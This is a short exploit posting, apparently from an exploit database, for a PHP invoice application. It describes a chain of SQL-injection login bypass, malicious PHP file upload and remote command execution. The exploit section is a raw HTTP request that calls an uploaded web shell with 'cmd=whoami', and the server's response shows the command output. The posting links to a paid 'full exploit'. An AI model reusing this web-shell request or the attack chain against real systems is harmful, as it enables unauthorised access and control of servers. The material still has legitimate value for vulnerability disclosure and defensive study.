INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE

# Titles: INVOICE-1.0-Copyright©2025-SQLi-Bypass-Authentication+FU+RCE
# Author: nu11secur1ty
# Date: 04/07/2025
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
# Reference: https://portswigger.net/web-security/sql-injection > https://portswigger.net/daily-swig/rce

### Description:
The username parameter appears to be vulnerable to SQL-bypass authentication injection attacks. 
The attacker can log in to this system by using this vulnerability, and then he can upload a malicious PHP file to this system.
After upload, he can execute this PHP file, and he can get sensitive information and even he can manage the system inside, it
depends on the scenario!  

STATUS: HIGH-CRITICAL Vulnerability


[+]Exploit:

```RCE
---
GET /pwnedhost/simple_invoice/uploads/1744008900_RCE.php?cmd=whoami HTTP/1.1
Host: 192.168.100.45
Cookie: PHPSESSID=divmu5157smqqnv6j7efs8br5p
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="24", "Chromium";v="134"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
```
[+]Response:

```RCE-response:
HTTP/1.1 200 OK
Date: Mon, 07 Apr 2025 07:48:39 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

desktop-ahflgug\nu11secur1ty
```

# Reproduce:
[href](https://www.patreon.com/posts/invoice-1-c-2025-126106368)

# Buy the full exploit: 
[href](https://satoshidisk.com/pay/CO7bRi)

# Time spent:
01:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>